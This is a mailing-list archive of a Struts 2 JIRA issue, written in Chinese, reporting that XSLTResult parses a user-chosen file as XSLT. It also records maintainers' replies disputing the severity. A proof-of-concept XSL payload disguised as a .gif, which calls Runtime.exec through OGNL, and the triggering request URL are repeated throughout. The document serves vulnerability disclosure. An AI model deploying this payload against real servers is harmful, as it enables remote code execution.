You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "kxlzx (Created) (JIRA)" <ji...@apache.org> on 2012/03/22 03:53:25 UTC
[jira] [Created] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
struts2框架XSLTResult本地文件代码执行漏洞
-----------------------------
Key: WW-3782
URL: https://issues.apache.org/jira/browse/WW-3782
Project: Struts 2
Issue Type: Bug
Components: Core Actions
Affects Versions: 2.3.1.2
Reporter: kxlzx
Priority: Critical
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
kxlzx updated WW-3782:
----------------------
Attachment: struts.jpg
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235345#comment-13235345 ]
kxlzx commented on WW-3782:
---------------------------
以前都是我用google翻译,这次推荐给大家用。
If you can not read, open here.
http://translate.google.com/#zh-CN|en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "zhouyanming (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302 ]
zhouyanming commented on WW-3782:
---------------------------------
哥们太搞了,天朝还没占领全世界
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235436#comment-13235436 ]
Lukasz Lenart commented on WW-3782:
-----------------------------------
You mean, that your applications is taking a user file and uses it as an input for XSTL Result ? Without checking content of the file ? XSLT Result was designed to base on server side files and not to use any file uploaded by accidental user.
It's exactly the same case when you aren't escaping input form parameters and use them directly in your SQL queries - it's called SQL injection.
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
kxlzx updated WW-3782:
----------------------
Description:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
was:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235406#comment-13235406 ]
Lukasz Lenart commented on WW-3782:
-----------------------------------
W czym jest problem ?
If you can not read, open here.
http://translate.google.com/#pl|zh-CN|W%20czym%20jest%20problem%20%3F
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "Rene Gielen (Updated) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Rene Gielen updated WW-3782:
----------------------------
Priority: Minor (was: Critical)
Fix Version/s: 2.3.2
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Minor
> Labels: patch
> Fix For: 2.3.2
>
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235429#comment-13235429 ]
kxlzx commented on WW-3782:
---------------------------
攻击者可以上传图片文件,执行任意代码
If you can not read, open here.
http://translate.google.cn/?hl=en#zh-CN|en|%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6%EF%BC%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235434#comment-13235434 ]
Lukasz Lenart commented on WW-3782:
-----------------------------------
First you're talking about some file upload issue with the XSLT plugin, next your're presenting some hardcoded code with call to static methods (which can be blocked by setting up configuration flag).
And first of all, please report any security issues throughout security@struts.apache.org
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
